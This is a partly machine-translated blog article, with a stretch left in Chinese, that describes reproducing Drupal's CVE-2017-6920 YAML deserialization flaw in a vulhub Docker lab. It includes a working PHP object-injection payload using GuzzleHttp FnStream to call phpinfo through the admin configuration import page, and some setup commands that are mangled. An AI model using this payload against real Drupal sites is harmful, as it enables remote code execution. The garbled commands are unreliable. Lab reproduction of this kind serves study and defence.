Shulou(Shulou.com)05/31 Report--

This article will explain in detail how to carry out Drupal YAML deserialization code execution vulnerability CVE-2017-6920 recurrence, the quality of the article content is high, so Xiaobian share for everyone to make a reference, I hope you have a certain understanding of related knowledge after reading this article.

Drupal is an open source content management framework (CMF) written in PHP, which consists of a content management system and a PHP development framework, released under the GPL 2.0 and newer licenses. Winner of the World's Best CMS Award for many years, it is the most famous WEB application based on PHP language.

On June 21, 2017, Drupal officially released a vulnerability with the number CVE-2017- 6920, with Critical impact. This is a remote code execution vulnerability caused by mishandling of Drupal Core's YAML parser.

Vulnerability affected: Drupal

< 8.3.4 下面仅作漏洞复现记录与实现，利用流程如下: 一、漏洞环境 本次演示环境采用vulhub搭建，执行以下命令搭建 cd /drupal/CVE-2017-6920/ docker-compose up -d 之后开启了8080端口，访问之后正常安装即可，由于没有mysql环境，所以安装的时候可以选择sqlite数据库 安装完毕之后还需要安装yaml扩展，首先执行docker ps查看容器id 之后执行docker exec -it a3df54b9def6 bash 进入容器命令行后依次执行以下命令 # 换镜像源，默认带vim编辑器，所以用cat换源，可以换成自己喜欢的源cat >

sources.list >/usr/local/etc/php/conf.d/docker-php-ext-yaml.ini#exit container exit#restart container, CONTAINER replace with own container IDdocker restart CONTAINER

And then you can start reproducing the bug.

Vulnerability link: http://192.168.101.152:8080/

After accessing, as shown in the following figure, note that to reproduce this vulnerability, you need to log in to the administrator account.

II. Recurrence of loopholes

Log in to an administrative account

Visit link 192.168.101.152:8080/admin/config/development/configuration/single/import

After that, select Configuration type as Simple configuration, Configuration name can be filled in casually, Paste your configuration here and write poc:

! php/object "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\0GuzzleHttp\\Psr7\\FnStream\0methods\";a:1:{s:5:\"close\";s:7:\"phpinfo\";}s:9:\"_fn_close\";s:7:\"phpinfo\";}"

Then click the Import button in the lower left corner to trigger the vulnerability

End of reproduction.

About how to carry out Drupal YAML deserialization code execution vulnerability CVE-2017-6920 recurrence is shared here, I hope the above content can be of some help to everyone, you can learn more knowledge. If you think the article is good, you can share it so that more people can see it.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.